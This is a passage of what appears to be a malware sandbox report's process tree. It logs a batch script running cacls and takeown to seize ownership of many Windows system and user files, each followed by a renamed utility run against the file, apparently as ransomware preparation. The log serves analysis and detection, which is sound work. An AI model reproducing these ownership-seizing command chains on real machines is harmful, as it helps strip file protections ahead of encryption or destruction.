    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    - Modifies file permissions
    PID:4040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:4452
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:2688
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:1512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:6396
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:7020
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:5560
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.2c7986e0-2495-48fd-a582-ca90ddf55294.1.etl""
  2⤵
  PID:5644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.2c7986e0-2495-48fd-a582-ca90ddf55294.1.etl" /E /G Admin:F /C
    3⤵
    PID:7888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.2c7986e0-2495-48fd-a582-ca90ddf55294.1.etl"
    3⤵
    - Modifies file permissions
    PID:7252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "WuProvider.2c7986e0-2495-48fd-a582-ca90ddf55294.1.etl" -nobanner
    3⤵
    PID:5272
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "WuProvider.2c7986e0-2495-48fd-a582-ca90ddf55294.1.etl" -nobanner
      4⤵
      PID:7732
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:7756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:8152
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:7912
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:1304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:6608
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    PID:6548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:7060
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      PID:7856
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:7540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    PID:7108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:8052
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:5692
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    PID:7164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:5620
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6460
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""
  2⤵
  PID:6544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000004.bin" -nobanner
    3⤵
    PID:7132
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000004.bin" -nobanner
      4⤵
      PID:6372
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""
  2⤵
  PID:7096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"
    3⤵
    PID:6480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000H.bin" -nobanner
    3⤵
    PID:6468
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000H.bin" -nobanner
      4⤵
      PID:7336
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""
  2⤵
  PID:8048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C
    3⤵
    PID:7272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"
    3⤵
    PID:6852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000S.bin" -nobanner
    3⤵
    PID:6328
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000S.bin" -nobanner
      4⤵
      PID:6792
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""
  2⤵
  PID:6428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C
    3⤵
    PID:6384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"
    3⤵
    PID:7036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000016.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7396
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000016.bin" -nobanner
      4⤵
      PID:6764
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""
  2⤵
  PID:3476
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C
    3⤵
    PID:7996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"
    3⤵
    - Modifies file permissions
    PID:7040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000050.bin" -nobanner
    3⤵
    PID:7760
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000050.bin" -nobanner
      4⤵
      PID:7556
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin""
  2⤵
  PID:7676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C
    3⤵
    PID:3284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"
    3⤵
    - Modifies file permissions
    PID:6180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000006S.bin" -nobanner
    3⤵
    PID:7240
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000006S.bin" -nobanner
      4⤵
      PID:7220
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin""
  2⤵
  PID:4716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" /E /G Admin:F /C
    3⤵
    PID:7172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin"
    3⤵
    PID:7632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000076.bin" -nobanner
    3⤵
    PID:1164
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000076.bin" -nobanner
      4⤵
      PID:8128
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin""
  2⤵
  PID:5260
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" /E /G Admin:F /C
    3⤵
    PID:8100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin"
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007G.bin" -nobanner
    3⤵
    PID:5140
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007G.bin" -nobanner
      4⤵
      PID:5996
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin""
  2⤵
  PID:5156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5412
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin"
    3⤵
    - Modifies file permissions
    PID:4440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007Q.bin" -nobanner
    3⤵
    PID:3480
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007Q.bin" -nobanner
      4⤵
      PID:2624
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin""
  2⤵
  PID:6580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin" /E /G Admin:F /C
    3⤵
    PID:5432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin"
    3⤵
    - Modifies file permissions
    PID:5384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000008F.bin" -nobanner
    3⤵
    PID:5784
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000008F.bin" -nobanner
      4⤵
      PID:6880
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin""
  2⤵
  PID:5792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin" /E /G Admin:F /C
    3⤵
    PID:7056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin"
    3⤵
    PID:6024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000095.bin" -nobanner
    3⤵
    PID:5812
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000095.bin" -nobanner
      4⤵
      PID:6800
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin""
  2⤵
  PID:7816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin" /E /G Admin:F /C
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin"
    3⤵
    - Modifies file permissions
    PID:668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000A0.bin" -nobanner
    3⤵
    PID:1388
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000A0.bin" -nobanner
      4⤵
      PID:6828
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:6684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    PID:5800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:7288
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:5548
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:6020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6616
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1600
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7136
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    PID:6636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2984
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:6112
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:4380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:4588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:3124
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:3560
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:3244
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:3420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:4128
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:2852
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:1420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:6316
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:6396
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin""
  2⤵
  PID:6500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin" /E /G Admin:F /C
    3⤵
    PID:3248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin"
    3⤵
    PID:7268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000007.bin" -nobanner
    3⤵
    PID:2540
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000007.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:7520
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
